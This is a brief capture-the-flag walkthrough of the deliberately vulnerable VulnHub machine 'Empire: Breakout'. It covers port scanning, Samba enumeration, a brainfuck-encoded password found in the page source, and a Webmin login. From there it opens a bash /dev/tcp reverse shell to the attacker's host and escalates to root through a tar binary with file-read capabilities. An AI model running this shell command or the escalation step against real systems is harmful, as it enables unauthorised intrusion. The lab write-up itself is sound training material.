VulnHub: Empire: Breakout

Al1z4deh:~# echo "Welcome"
3 min readMay 28, 2022

Today we will take a look at Vulnhub: Breakout. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan
nmap -p- -sV -sC --open      STATE SERVICE     VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10000/tcp open http MiniServ 1.981 (Webmin httpd)
|_http-server-header: MiniServ/1.981
|_http-title: 200 — Document follows
20000/tcp open http MiniServ 1.830 (Webmin httpd)
|_http-server-header: MiniServ/1.830
|_http-title: 200 — Document follows
  • Enum4linux

Command: enum4linux -a

We found a username here

  • Web

If we look at the bottom of the page’s source code, we see a text encrypted by the brainfuck algorithm.


don't worry no one will get here, it's safe to share with you my access. Its encrypted :)



If we decode, we get the password.

  • Reverse Shell

When we look at port 20000, it redirects us to the admin panel with a link

Username: cyberPassword: .2uqPEfj3D<P'a-3

Once logged in, there is a terminal icon on the bottom left. With its we can carry out orders. I’ll get a reverse shell.

bash -i >& /dev/tcp/YourIP/1234 0>&1
  • Root

Command: getcap -r / 2>/dev/null

/home/cyber/tar cap_dac_read_search=ep
cyber@breakout:~$ ./tar -cvf old_pass /var/backups/.old_pass.bakcyber@breakout:~$ ./tar -xvf old_passcyber@breakout:~$ cat var/backups/.old_pass.bak
cyber@breakout:~$ su root

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”